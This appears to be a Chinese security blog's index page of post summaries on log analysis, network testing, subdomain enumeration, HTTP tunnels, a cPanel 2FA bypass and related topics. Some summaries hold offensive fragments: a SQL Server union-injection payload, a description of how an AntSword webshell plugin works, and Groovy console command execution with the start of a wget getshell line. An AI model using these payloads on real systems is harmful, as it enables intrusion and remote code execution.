komomon

摘要： 整理一些服务器日志分析命令 原文 1、查看有多少个IP访问： awk '{print $1}' log_file|sort|uniq|wc -l 2、查看某一个页面被访问的次数： grep "/index.php" log_file | wc -l 3、查看每一个IP访问了多少个页面： awk '{ 阅读全文

摘要： 协议：ICMP、TCP、UDP、http、DNS ICMP ping ip/domain tracert ip/domain ping www.baidu.com # ICMP tracert baidu.com # ICMP TCP/UDP telnet ip port nc -zv ip por 阅读全文

摘要： 起因 一次渗透过程中目标使用的SQL Server有联合注入，发现使用union all 不报错，union报错，同时还有一个就是字段的类型，发现类型不对也会报错，贴张图 union+all+select+123123,1,'2','3',null,null,null--+- 不报错 union+s 阅读全文

摘要： 子域名探测方法 在线接口 暴力枚举 搜索引擎 Certificate Transparency（证书透明） Subject Alternate Name (SAN) - 主题备用名称 Public datasets（公开数据集） 信息泄露 内容解析（HTML，JavaScript，文件） DNS解析 阅读全文

摘要： 预备知识 dns（域名解析）： 域名解析是把域名指向网站空间IP，让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址，为了方便记忆，采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程。域名的解析工作由DNS服务器完成。 域名解析也叫域名指向、 阅读全文

摘要： 问题：目前蚁剑的扫端口插件，只能扫单个IP，不能批量C段扫端口，故抓包查看原理。 原理：依然是eval去执行字符串php代码。使用fsockopen去尝试建立连接，如果成功则说明端口开放，否则则视为关闭。 给蚁剑添加代理：然后burp抓包： 原始包：test2020.php为上传的脚本 可以看到就是 阅读全文

摘要： 总述： HTTP 1.1引入了HTTP tunnel，提供了支持任意流量的TCP隧道的能力。 HTTP proxy是一个中间人，是客户端去请求代理，代理修改请求再去请求网站，proxy不能代理HTTPS请求，因为代理不可能获得网站的私钥。 HTTP tunnel 不需要改写请求包，将C S之间的流量 阅读全文

摘要： 运行.sh文件 直接用./sh 文件就可以运行，但是如果想后台运行，即使关闭当前的终端也可以运行的话，需要nohup命令和&命令。 &命令 功能：加在一个命令的最后，可以把这个命令放在后台执行 nohup命令 功能：不挂断的运行命令 被运行的程序的输出将不会在终端中显示，默认会输出到当前目录下的no 阅读全文

摘要： cPanel是管理web托管的流行管理工具的提供商，它修补了一个安全漏洞，该漏洞可能允许远程攻击者访问有效凭据，绕过帐户的两因素身份验证（2FA）保护。 该问题被称为“seco -575”，由Digital Defense研究人员发现，该公司在软件的11.92.0.2、11.90.0.17和11.8 阅读全文

摘要： 昨天晚上面试官问到了，还没来得及看，今天又问到了，猝不及防，蓝瘦，香菇、、、 今天特此总结一下，给自己一个交代。 总述：进入后台可进行如下操作： 直接执行系统命令： println "cmd".execute().text wget下载文件getshell： println "wget http:/ 阅读全文